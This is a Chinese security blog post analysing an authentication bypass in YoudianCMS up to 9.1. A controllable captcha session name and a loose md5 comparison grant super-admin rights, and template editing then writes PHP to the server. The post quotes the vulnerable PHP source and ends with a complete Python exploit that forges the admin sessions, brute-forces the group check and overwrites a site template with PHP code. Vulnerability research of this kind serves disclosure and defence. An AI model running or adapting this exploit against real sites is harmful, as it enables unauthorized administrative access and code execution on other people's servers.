<!DOCTYPE html>
<html lang="en">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="keywords" content="" />
  <meta name="author" content="John Doe" />
  <meta name="description" content="" />
  
  
  <title>
    
      友点CMS 后台登录绕过 GetShell 
      
      
      |
    
     N0puple
  </title>

  
    <link rel="apple-touch-icon" href="/images/001.ico">
    <link rel="icon" href="/images/001.ico">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  
<link rel="stylesheet" href="/css/base.css">
<link rel="stylesheet" href="/iconfont/iconfont.css">
<link rel="stylesheet" href="/css/github-markdown.css">
<link rel="stylesheet" href="/css/highlight.css">


  <!-- jquery3.3.1 -->
  <script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

  <!-- fancybox -->
  <link href="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.css" rel="stylesheet">
  <script async src="https://cdn.bootcss.com/fancybox/3.5.2/jquery.fancybox.min.js"></script>
  
<script src="/js/fancybox.js"></script>


  

<meta name="generator" content="Hexo 5.4.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/1.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">N0puple</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">主页</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">归档</a>
        </li>
      
        <li class="nav-item" data-path="/tags/">
          <a href="/tags/">标签</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">朋友</a>
        </li>
      
        <li class="nav-item" data-path="/about/">
          <a href="/about/">关于我</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->

<!-- LaTex Display -->
<script src="https://polyfill.io/v3/polyfill.min.js?features=es6"></script>
<script type="text/javascript" id="MathJax-script" async
  src="https://cdn.jsdelivr.net/npm/mathjax@3/es5/tex-chtml.js">
</script>
<script>
MathJax = {
  tex: {
    inlineMath: [['$', '$'], ['\\(', '\\)']]
  }
};
</script>



  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">友点CMS 后台登录绕过 GetShell</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime" title="Update time"></i>
          2021-06-29 22:27:56
        </span>
        
              <span class="post-tags">
                <i class="iconfont icon-tags" title="Tags"></i>
                
                <span class="span--tag">
                  <a href="/tags/php/" title="php">
                    <b>#</b> php
                  </a>
                </span>
                
                <span class="span--tag">
                  <a href="/tags/%E5%8F%8B%E7%82%B9cms/" title="友点cms">
                    <b>#</b> 友点cms
                  </a>
                </span>
                
                <span class="span--tag">
                  <a href="/tags/%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87/" title="登录绕过">
                    <b>#</b> 登录绕过
                  </a>
                </span>
                
              </span>
          
      </div>
      <div class="markdown-body">
        <h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h2><p>友点 CMS 后台登录绕过 GetShell ，攻击者可无需任意权限即可登录后台并 getshell</p>
<h2 id="漏洞影响"><a href="#漏洞影响" class="headerlink" title="漏洞影响"></a>漏洞影响</h2><p>youdiancms &lt;=9.1</p>
<h2 id="漏洞细节"><a href="#漏洞细节" class="headerlink" title="漏洞细节"></a>漏洞细节</h2><h3 id="漏洞流程"><a href="#漏洞流程" class="headerlink" title="漏洞流程"></a>漏洞流程</h3><ul>
<li>验证码可设置session</li>
<li>session(AdminGroupID==1) 超级管理员</li>
<li>后台模板修改代码执行</li>
</ul>
<h3 id="任意-session-获取"><a href="#任意-session-获取" class="headerlink" title="任意 session 获取"></a>任意 session 获取</h3><p>看到 App/Lib/Action/BaseAction.class.php ，217 行 verifyCode 函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">verifyCode</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$length</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;length&#x27;</span>];        <span class="comment">//长度</span></span><br><span class="line">    <span class="variable">$mode</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;mode&#x27;</span>];          <span class="comment">//模式</span></span><br><span class="line">    <span class="variable">$type</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;type&#x27;</span>];              <span class="comment">//图像类型</span></span><br><span class="line">    <span class="variable">$width</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;width&#x27;</span>];           <span class="comment">//宽度</span></span><br><span class="line">    <span class="variable">$height</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;height&#x27;</span>];        <span class="comment">//高度</span></span><br><span class="line">    <span class="variable">$verifyName</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;verify&#x27;</span>];  <span class="comment">//验证码session名称</span></span><br><span class="line">    import(<span class="string">&quot;ORG.Util.Image&quot;</span>);</span><br><span class="line">    Image::buildImageVerify(<span class="variable">$length</span>, <span class="variable">$mode</span>, <span class="variable">$type</span>, <span class="variable">$width</span>, <span class="variable">$height</span>, <span class="variable">$verifyName</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这是一个生成验证码的函数，可以看到，这些参数都是可控的，进入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Image::buildImageVerify(<span class="variable">$length</span>, <span class="variable">$mode</span>, <span class="variable">$type</span>, <span class="variable">$width</span>, <span class="variable">$height</span>, <span class="variable">$verifyName</span>);</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">buildImageVerify</span>(<span class="params"><span class="variable">$length</span>=<span class="number">4</span>, <span class="variable">$mode</span>=<span class="number">1</span>, <span class="variable">$type</span>=<span class="string">&#x27;png&#x27;</span>, <span class="variable">$width</span>=<span class="number">48</span>, <span class="variable">$height</span>=<span class="number">22</span>, <span class="variable">$verifyName</span>=<span class="string">&#x27;verify&#x27;</span></span>) </span>&#123;</span><br><span class="line">    import(<span class="string">&#x27;ORG.Util.StringEx&#x27;</span>);</span><br><span class="line">    <span class="variable">$randval</span> = StringEx::randString(<span class="variable">$length</span>, <span class="variable">$mode</span>);</span><br><span class="line">    <span class="variable">$_SESSION</span>[<span class="variable">$verifyName</span>] = md5(<span class="variable">$randval</span>);</span><br><span class="line">    ...</span><br></pre></td></tr></table></figure>

<p>看到这句</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$_SESSION</span>[<span class="variable">$verifyName</span>] = md5(<span class="variable">$randval</span>);</span><br></pre></td></tr></table></figure>

<p><code>$verifyName</code> 是可控的，也就是说我们可以控制 <code>$_SESSION</code> 的键，后面的 md5 值暂时不考虑</p>
<p>接下来我们找可以利用的地方，我们看到管理员登陆的地方 App/Lib/Action/AdminBaseAction.class.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">_initialize</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$mName</span> = strtolower(ACTION_NAME);</span><br><span class="line">    <span class="variable">$NoCheckAction</span> = <span class="keyword">array</span>(<span class="string">&#x27;login&#x27;</span>, <span class="string">&#x27;verify&#x27;</span>,<span class="string">&#x27;checklogin&#x27;</span>,<span class="string">&#x27;showcode&#x27;</span>,<span class="string">&#x27;logout&#x27;</span>); <span class="comment">//免登录验证模块</span></span><br><span class="line">    <span class="keyword">if</span>( !<span class="keyword">$this</span>-&gt;isLogin() &amp;&amp; !in_array(<span class="variable">$mName</span>, <span class="variable">$NoCheckAction</span>))&#123; <span class="comment">//没有登录，将返回登录页面</span></span><br><span class="line">        <span class="keyword">$this</span>-&gt;redirect(<span class="string">&quot;Public/login&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>( !<span class="keyword">$this</span>-&gt;checkPurview() )&#123; <span class="comment">//没有登录，将返回网站首页</span></span><br><span class="line">        <span class="keyword">$this</span>-&gt;redirect(<span class="string">&quot;Public/welcome&quot;</span>);</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>这是初始化的位置，需要注意两个地方</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">$this</span>-&gt;isLogin()</span><br><span class="line"><span class="keyword">$this</span>-&gt;checkPurview()</span><br></pre></td></tr></table></figure>

<p>想要得到登陆的状态，就需要绕过这两个方法，先来看 <code>$this-&gt;isLogin()</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isLogin</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$b</span> = session(<span class="string">&quot;?AdminID&quot;</span>) &amp;&amp; session(<span class="string">&quot;?AdminName&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$b</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里很简单，只要存在 AdminID 和 AdminName 这两个session就可以，我们之前找到的地方就可以赋值</p>
<p>再来看 <code>$this-&gt;checkPurview()</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkPurview</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    <span class="variable">$gid</span> = session(<span class="string">&#x27;AdminGroupID&#x27;</span>);</span><br><span class="line">    <span class="keyword">if</span>( <span class="variable">$gid</span> == <span class="number">1</span> ) <span class="keyword">return</span> <span class="literal">true</span>;  <span class="comment">//超级管理员拥有所有权限</span></span><br></pre></td></tr></table></figure>

<p>这里首先要有一个 session AdminGroupID，这个容易满足，也可以直接赋值，但是只能获得普通的登陆权限，想要获得超级管理员的权限，就需要 <code>$gid == 1</code> ，看似没有办法完成，但是注意到这里是弱比较，而之前赋值的时候，是用的 md5 值，我们只需要得到一个 md5，满足第一个字符是 1 ，第二个字符不是数字，就可以完成</p>
<p>回到一开始的漏洞位置，我们看看如何生成 md5 值</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">import(<span class="string">&#x27;ORG.Util.StringEx&#x27;</span>);</span><br><span class="line"><span class="variable">$randval</span> = StringEx::randString(<span class="variable">$length</span>, <span class="variable">$mode</span>);</span><br><span class="line"><span class="variable">$_SESSION</span>[<span class="variable">$verifyName</span>] = md5(<span class="variable">$randval</span>);</span><br></pre></td></tr></table></figure>

<p>我们看到这里应该是生成的随机字符串，传入的 <code>$length</code> 和 <code>$mode</code>  是我们可控的，进入该函数</p>
<p>App/Core/Extend/Library/ORG/Util/StringEx.class.php 的 128 行 </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">static</span> <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">randString</span>(<span class="params"><span class="variable">$len</span>=<span class="number">6</span>,<span class="variable">$type</span>=<span class="string">&#x27;&#x27;</span>,<span class="variable">$addChars</span>=<span class="string">&#x27;&#x27;</span></span>) </span>&#123;</span><br><span class="line">    <span class="variable">$str</span> =<span class="string">&#x27;&#x27;</span>;</span><br><span class="line">    <span class="keyword">switch</span>(<span class="variable">$type</span>) &#123;</span><br><span class="line">        <span class="keyword">case</span> <span class="number">0</span>:</span><br><span class="line">            <span class="variable">$chars</span>=<span class="string">&#x27;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz&#x27;</span>.<span class="variable">$addChars</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> <span class="number">1</span>:</span><br><span class="line">            <span class="variable">$chars</span>= str_repeat(<span class="string">&#x27;0123456789&#x27;</span>,<span class="number">3</span>);</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> <span class="number">2</span>:</span><br><span class="line">            <span class="variable">$chars</span>=<span class="string">&#x27;ABCDEFGHIJKLMNOPQRSTUVWXYZ&#x27;</span>.<span class="variable">$addChars</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> <span class="number">3</span>:</span><br><span class="line">            <span class="variable">$chars</span>=<span class="string">&#x27;abcdefghijklmnopqrstuvwxyz&#x27;</span>.<span class="variable">$addChars</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">case</span> <span class="number">4</span>:</span><br><span class="line">            <span class="variable">$chars</span> = <span class="string">&quot;们以我到...&quot;</span>.<span class="variable">$addChars</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        <span class="keyword">default</span> :</span><br><span class="line">            <span class="comment">// 默认去掉了容易混淆的字符oOLl和数字01，要添加请使用addChars参数</span></span><br><span class="line">            <span class="variable">$chars</span>=<span class="string">&#x27;ABCDEFGHIJKMNPQRSTUVWXYZabcdefghijkmnpqrstuvwxyz23456789&#x27;</span>.<span class="variable">$addChars</span>;</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$len</span>&gt;<span class="number">10</span> ) &#123;<span class="comment">//位数过长重复字符串一定次数</span></span><br><span class="line">        <span class="variable">$chars</span>= <span class="variable">$type</span>==<span class="number">1</span>? str_repeat(<span class="variable">$chars</span>,<span class="variable">$len</span>) : str_repeat(<span class="variable">$chars</span>,<span class="number">5</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$type</span>!=<span class="number">4</span>) &#123;</span><br><span class="line">        <span class="variable">$chars</span>   =   str_shuffle(<span class="variable">$chars</span>);</span><br><span class="line">        <span class="variable">$str</span>     =   substr(<span class="variable">$chars</span>,<span class="number">0</span>,<span class="variable">$len</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="comment">// 中文随机字</span></span><br><span class="line">        <span class="keyword">for</span>(<span class="variable">$i</span>=<span class="number">0</span>;<span class="variable">$i</span>&lt;<span class="variable">$len</span>;<span class="variable">$i</span>++)&#123;</span><br><span class="line">          <span class="variable">$str</span>.= <span class="built_in">self</span>::msubstr(<span class="variable">$chars</span>, floor(mt_rand(<span class="number">0</span>,mb_strlen(<span class="variable">$chars</span>,<span class="string">&#x27;utf-8&#x27;</span>)-<span class="number">1</span>)),<span class="number">1</span>,<span class="string">&#x27;utf-8&#x27;</span>,<span class="literal">false</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$str</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到，这里是利用 <code>$type</code> 选择相应的字符串，然后用 <code>$len</code>  控制长度，最后生成字符串</p>
<p>满足条件的 md5 值，1 - 100 以内就有 3个 ，为了减少爆破的次数，我们就直接选择数字以及长度设置成两位</p>
<h3 id="后台getshell"><a href="#后台getshell" class="headerlink" title="后台getshell"></a>后台getshell</h3><p>后台 getshell 可以利用修改模板</p>
<p><img src="https://gitee.com/N0puple/nopic/raw/master/img/20210629220227.png"></p>
<p>App/Lib/Action/Admin/TemplateAction.class.php 的 68 行 saveModify 方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">saveModify</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">    header(<span class="string">&quot;Content-Type:text/html; charset=utf-8&quot;</span>);</span><br><span class="line">    <span class="variable">$ThemeName</span> = C(<span class="string">&#x27;HOME_DEFAULT_THEME&#x27;</span>);</span><br><span class="line">    <span class="variable">$_POST</span>[<span class="string">&#x27;FileName&#x27;</span>] = YdInput::checkFileName( <span class="variable">$_POST</span>[<span class="string">&#x27;FileName&#x27;</span>] );</span><br><span class="line">    <span class="variable">$FullFileName</span> = TMPL_PATH.<span class="string">&#x27;Home/&#x27;</span>.<span class="variable">$ThemeName</span>.<span class="string">&#x27;/&#x27;</span>.ltrim(<span class="variable">$_POST</span>[<span class="string">&#x27;FileName&#x27;</span>],<span class="string">&#x27;/&#x27;</span>);</span><br><span class="line">    <span class="keyword">if</span>( !<span class="keyword">$this</span>-&gt;isValidTplFile(<span class="variable">$FullFileName</span>))&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;ajaxReturn(<span class="literal">null</span>, <span class="string">&#x27;无效模板文件!&#x27;</span> , <span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//实体解码</span></span><br><span class="line">    <span class="variable">$FileContent</span> = htmlspecialchars_decode(<span class="variable">$_POST</span>[<span class="string">&#x27;FileContent&#x27;</span>]); </span><br><span class="line">    <span class="keyword">if</span> (get_magic_quotes_gpc()) &#123;</span><br><span class="line">        <span class="variable">$FileContent</span> = stripslashes(<span class="variable">$FileContent</span>);</span><br><span class="line">    &#125;		</span><br><span class="line">    <span class="variable">$b</span> = file_put_contents(<span class="variable">$FullFileName</span>, <span class="variable">$FileContent</span>);</span><br></pre></td></tr></table></figure>

<p>首先获取文件名，然后将 post 上来的 content 写入模板文件，过程较为简单</p>
<h2 id="Exp"><a href="#Exp" class="headerlink" title="Exp"></a>Exp</h2><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">run</span>(<span class="params">url</span>):</span></span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        url1 = url + <span class="string">&quot;/index.php?a=verifyCode&amp;verify=AdminID&quot;</span></span><br><span class="line">        url2 = url + <span class="string">&quot;/index.php?a=verifyCode&amp;verify=AdminName&quot;</span></span><br><span class="line">        url3 = url + <span class="string">&quot;/index.php?a=verifyCode&amp;verify=AdminGroupID&amp;length=2&amp;mode=1&quot;</span></span><br><span class="line">        adminurl = url + <span class="string">&quot;/index.php/Admin/Public/AdminLeft/MenuTopID/7&quot;</span></span><br><span class="line">        s = requests.session()</span><br><span class="line">        s.get(url1)</span><br><span class="line">        <span class="built_in">print</span>(s.cookies)</span><br><span class="line">        s.get(url2)</span><br><span class="line">        s.get(url3)</span><br><span class="line">        html = s.get(adminurl).text</span><br><span class="line">        <span class="keyword">if</span> <span class="string">&#x27;模板&#x27;</span> <span class="keyword">in</span> html:</span><br><span class="line">            editurl = url + <span class="string">&#x27;/index.php/Admin/template/saveModify&#x27;</span></span><br><span class="line">            data = &#123;</span><br><span class="line">                <span class="string">&#x27;FileName&#x27;</span>: <span class="string">&#x27;/Public/header.html&#x27;</span>,</span><br><span class="line">                <span class="string">&#x27;FileContent&#x27;</span>: <span class="string">&quot;&lt;?php phpinfo();?&gt;&quot;</span></span><br><span class="line">            &#125;</span><br><span class="line">            s.post(editurl, data=data)</span><br><span class="line">            <span class="built_in">print</span>(<span class="string">&quot;[+] &quot;</span> + url + <span class="string">&quot;/index.php/&quot;</span>)</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    url = <span class="string">&#x27;http://127.0.0.1/youdiancms9.0&#x27;</span></span><br><span class="line">    run(url)</span><br></pre></td></tr></table></figure>

<h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>测试版本为 9.0，很多文章中写的利用短标签绕过过滤来getshell这里没有去用，可能是 9.1 才有的过滤，这个前面的绕过漏洞是很有意思的，后面的后台 getshell 写的有点草率，尤其是exp中，直接覆盖了整个模板文件，真实的渗透测试中还是不要这么干，毕竟会影响到正常的业务了。</p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2021/06/28/DedeCMS-%E5%89%8D%E5%8F%B0%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81%E4%BF%AE%E6%94%B9%E6%BC%8F%E6%B4%9E/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>Prev</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime" title="Update time"></i>
              2021-06-29 22:27:56
            </span>
            
                  <span class="post-tags">
                    <i class="iconfont icon-tags" title="Tags"></i>
                    
                    <span class="span--tag">
                      <a href="/tags/php/" title="php">
                        <b>#</b> php
                      </a>
                    </span>
                    
                    <span class="span--tag">
                      <a href="/tags/%E5%8F%8B%E7%82%B9cms/" title="友点cms">
                        <b>#</b> 友点cms
                      </a>
                    </span>
                    
                    <span class="span--tag">
                      <a href="/tags/%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87/" title="登录绕过">
                        <b>#</b> 登录绕过
                      </a>
                    </span>
                    
                  </span>
              
          </div>
          <div class="post-foot-prev">
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">Contents</div>
    <div class="catalog-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="toc-text">漏洞描述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%BD%B1%E5%93%8D"><span class="toc-text">漏洞影响</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E7%BB%86%E8%8A%82"><span class="toc-text">漏洞细节</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%B5%81%E7%A8%8B"><span class="toc-text">漏洞流程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%BB%E6%84%8F-session-%E8%8E%B7%E5%8F%96"><span class="toc-text">任意 session 获取</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%90%8E%E5%8F%B0getshell"><span class="toc-text">后台getshell</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Exp"><span class="toc-text">Exp</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-text">总结</span></a></li></ol>
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
  </div>


        <div class="footer">
  <div class="social">
    <ul>
      
        <li>
          <a title="github" target="_blank" rel="noopener" href="https://github.com/N0puple/">
            <i class="iconfont icon-github"></i>
          </a>
        </li>
      
    </ul>
  </div>
  
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/N0puple/">Copyright © N0puple 2020</a>
        
    </div>
  
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
</div>

      </div>

      <div class="back-to-top hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



      
  <div class="search-icon" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>First search, index file loading, please wait...<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
